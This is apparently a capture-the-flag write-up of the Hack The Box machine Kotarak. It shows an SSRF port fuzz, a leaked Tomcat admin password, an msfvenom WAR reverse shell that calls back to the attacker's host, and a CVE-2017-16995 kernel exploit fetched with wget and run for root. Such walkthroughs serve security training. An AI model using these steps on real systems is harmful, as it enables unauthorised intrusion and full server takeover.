I started this machine by first running an Nmap scan:
# Nmap 7.91 scan initiated Tue Jan 26 13:40:52 2021 as: nmap -p- -sC -sV -oN scan -O 10.10.10.55 Nmap scan report for 10.10.10.55 Host is up (0.021s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e2:d7:ca:0e:b7:cb:0a:51:f7:2e:75:ea:02:24:17:74 (RSA) | 256 e8:f1:c0:d3:7d:9b:43:73:ad:37:3b:cb:e1:64:8e:e9 (ECDSA) |_ 256 6d:e9:26:ad:86:02:2d:68:e1:eb:ad:66:a0:60:17:b8 (ED25519) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) | ajp-methods: | Supported methods: GET HEAD POST PUT DELETE OPTIONS | Potentially risky methods: PUT DELETE |_ See https://nmap.org/nsedoc/scripts/ajp-methods.html 8080/tcp open http Apache Tomcat 8.5.5 |_http-favicon: Apache Tomcat | http-methods: |_ Potentially risky methods: PUT DELETE |_http-title: Apache Tomcat/8.5.5 - Error report 60000/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Kotarak Web Hosting No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=1/26%OT=22%CT=1%CU=39727%PV=Y%DS=2%DC=I%G=Y%TM=6010628 OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS=8)OPS OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1 OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N% OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD OS:=S) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Jan 26 13:42:18 2021 -- 1 IP address (1 host up) scanned in 86.08 seconds
We can see there are multiple ports open. I started by investigating port 60000 which bought me to a page which allowed browsing to other pages through the web form.
I entered the localhost address for port 8080, which was the other open port found on the Nmap scan. It was successful in browsing to this page through the form. The HTTP request was:
http://10.10.10.55:60000/url.php?path=http%3A%2F%2F127.0.0.1:8080
I then decided to use WFUZZ to attempt to connect to other ports hosted on the machine which were not listening externally.
┌──(root💀kali)-[/home/kali/Documents/kotarak] └─# wfuzz -z range,0-65535 --hl 2 http://10.10.10.55:60000/url.php?path=http://127.0.0.1:FUZZ 1 ⚙ /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://10.10.10.55:60000/url.php?path=http://127.0.0.1:FUZZ Total requests: 65536 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000023: 200 4 L 4 W 62 Ch "22" 000000091: 200 11 L 18 W 156 Ch "90" 000000111: 200 17 L 24 W 187 Ch "110" 000000201: 200 3 L 2 W 22 Ch "200" 000000321: 200 26 L 109 W 1232 Ch "320" 000000889: 200 78 L 265 W 3955 Ch "888" 000003307: 200 3 L 7 W 123 Ch "3306" 000060001: 200 78 L 130 W 1171 Ch "60000" Total time: 0 Processed Requests: 65536 Filtered Requests: 65528 Requests/sec.: 0
As you can see from the output, there was a number of pages returned. The one of interest was on port 888 which returned a Simple File Viewer:
The backup file on the page appears to be of a significant size. Looking at the source I could see to access this page the php parameter ?doc=backup was required.
<td class="tableElement"><a href="?doc=backup" class="tableElement">backup</a></td>
Because of the layered requests through the browser not returning the correct result i had to forward the request to burp to URL encode the request. I sent the following request using BURP repeater to get the backup file.
GET /url.php?path=http%3a//127.0.0.1%3a888%3fdoc%3dbackup HTTP/1.1
The backup file was successfully returned:
HTTP/1.1 200 OK
Date: Sat, 30 Jan 2021 18:31:13 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2271
Connection: close
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
version="1.0">
<!--
NOTE: By default, no user is included in the "manager-gui" role required
to operate the "/manager/html" web application. If you wish to use this app,
you must define such a user - the username and password are arbitrary. It is
strongly recommended that you do NOT use one of the users in the commented out
section below since they are intended for use with the examples web
application.
-->
<!--
NOTE: The sample user and role entries below are intended for use with the
examples web application. They are wrapped in a comment and thus are ignored
when reading this file. If you wish to configure these users for use with the
examples web application, do not forget to remove the <!.. ..> that surrounds
them. You will also need to set the passwords to something appropriate.
-->
<!--
<role rolename="tomcat"/>
<role rolename="role1"/>
<user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
<user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
<user username="role1" password="<must-be-changed>" roles="role1"/>
-->
<user username="admin" password="3@g01PdhB!" roles="manager,manager-gui,admin-gui,manager-script"/>
</tomcat-users>
Near the bottom of the response a username and password is provided.
I knew from past experience that Tomcat tends to have a management page at http://10.10.10.55:8080/manager/html
I browsed to this page hosted through port 8080 and was greeting with a login prompt. I entered the details provided in the backup file and successfully logged in.
You are able to get RCE through this Tomcat Web Application Manager by uploading a WAR reverse shell. I created a WAR reverse shell using MSFVENOM:
┌──(root💀kali)-[/home/kali/Documents/kotarak] └─# msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.15 lport=2600 -f war > shell.war Payload size: 1091 bytes Final size of war file: 1091 bytes
I then uploaded this file using the deployment feature in the Tomcat application manger.
Once uploaded the shell appears on the application list as seen in the screenshot. I started a netcat lister on my kali machine:
┌──(root💀kali)-[/home/kali/Documents/kotarak] └─# nc -nvlp 2600 130 ⨯ Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::2600 Ncat: Listening on 0.0.0.0:2600
The shell was then executed by clicking the link in the application list:
┌──(root💀kali)-[/home/kali/Documents/kotarak] └─# nc -nvlp 2600 130 ⨯ Ncat: Version 7.91 ( https://nmap.org/ncat ) Ncat: Listening on :::2600 Ncat: Listening on 0.0.0.0:2600 Ncat: Connection from 10.10.10.55. Ncat: Connection from 10.10.10.55:33422. ls backups bin boot dev etc home lib lib32 lib64 libx32 lost+found media mnt opt proc root run sbin snap srv sys tmp usr var vmlinuz vmlinuz.old
As you can see from the output, the reverse shell was succesfully captured. I then ran “UNAME – A” to get the kernal version:
root@kotarak-dmz:/var/lib/lxc/kotarak-int/rootfs/root# uname -a uname -a Linux kotarak-dmz 4.4.0-83-generic #106-Ubuntu SMP Mon Jun 26 17:54:43 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
I could see that 4.4.0-83-generic was being used. As EXPLOIT exists for this kernel which esclated privilages to root. I downloaded the exploit and compiled it on my kali machine.
┌──(root💀kali)-[/var/www]
└─# wget https://raw.githubusercontent.com/SecWiki/linux-kernel-exploits/master/2017/CVE-2017-16995/upstream44.c
--2021-01-30 13:13:39-- https://raw.githubusercontent.com/SecWiki/linux-kernel-exploits/master/2017/CVE-2017-16995/upstream44.c
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.60.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.60.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5776 (5.6K) [text/plain]
Saving to: ‘upstream44.c’
upstream44.c 100%[=======================================================================================================================================>] 5.64K --.-KB/s in 0.007s
2021-01-30 13:13:39 (757 KB/s) - ‘upstream44.c’ saved [5776/5776]
┌──(root💀kali)-[/var/www]
└─# gcc -o pwned upstream44.c
I then hosted the binary through HTTP and downloaded it to the kotarak machine and executed it:
tomcat@kotarak-dmz:/tmp$ wget http://10.10.14.15:8000/pwned wget http://10.10.14.15:8000/pwned --2021-01-30 13:13:57-- http://10.10.14.15:8000/pwned Connecting to 10.10.14.15:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 17880 (17K) [application/octet-stream] Saving to: ‘pwned’ pwned 100%[===================>] 17.46K 81.9KB/s in 0.2s 2021-01-30 13:13:57 (81.9 KB/s) - ‘pwned’ saved [17880/17880] tomcat@kotarak-dmz:/tmp$ chmod +x pwned chmod +x pwned tomcat@kotarak-dmz:/tmp$ ./pwned ./pwned task_struct = ffff880037660e00 uidptr = ffff88003562c904 spawning root shell root@kotarak-dmz:/root# cd /home cd /home root@kotarak-dmz:/home# ls ls atanas tomcat root@kotarak-dmz:/home# cd atanas cd atanas root@kotarak-dmz:/home/atanas# ls ls user.txt root@kotarak-dmz:/home/atanas# cat user.txt cat user.txt [REDACTED}
The execution was successful and I was able to navigate to the atanas user and capture the user flag. I tried also to navigate to the root directory but the root flag wasnt present:
root@kotarak-dmz:/tmp# cd /root cd /root root@kotarak-dmz:/root# ls ls app.log flag.txt root@kotarak-dmz:/root# cat flag.txt cat flag.txt Getting closer! But what you are looking for can't be found here.
I used the find command to search for the location of the root.txt flag:
root@kotarak-dmz:/# find . -name "root.txt" find . -name "root.txt" ................................. find: ‘./var/lib/lxcfs/cgroup/devices/system.slice/system-systemd\\x2dfsck.slice/devices.allow’: Permission denied find: ‘./var/lib/lxcfs/cgroup/devices/system.slice/system-systemd\\x2dfsck.slice/devices.deny’: Permission denied find: ‘./var/lib/lxcfs/cgroup/devices/user.slice/devices.allow’: Permission denied find: ‘./var/lib/lxcfs/cgroup/devices/user.slice/devices.deny’: Permission denied ./var/lib/lxc/kotarak-int/rootfs/root/root.txt
We can see from the bottom line of the output that it where the root flag was located.
root@kotarak-dmz:/# cd /var cd /var/ root@kotarak-dmz:/var# cd lib cd lib root@kotarak-dmz:/var/lib# cd lxc cd lxc root@kotarak-dmz:/var/lib/lxc# cd kotarak-int cd kotarak-int root@kotarak-dmz:/var/lib/lxc/kotarak-int# cd rootfs cd rootfs root@kotarak-dmz:/var/lib/lxc/kotarak-int/rootfs# cd root cd root root@kotarak-dmz:/var/lib/lxc/kotarak-int/rootfs/root# ls ls root.txt root@kotarak-dmz:/var/lib/lxc/kotarak-int/rootfs/root# cat root.txt cat root.txt [REDACTED]
With the root flag location I was able to capture the root flag sucessfully.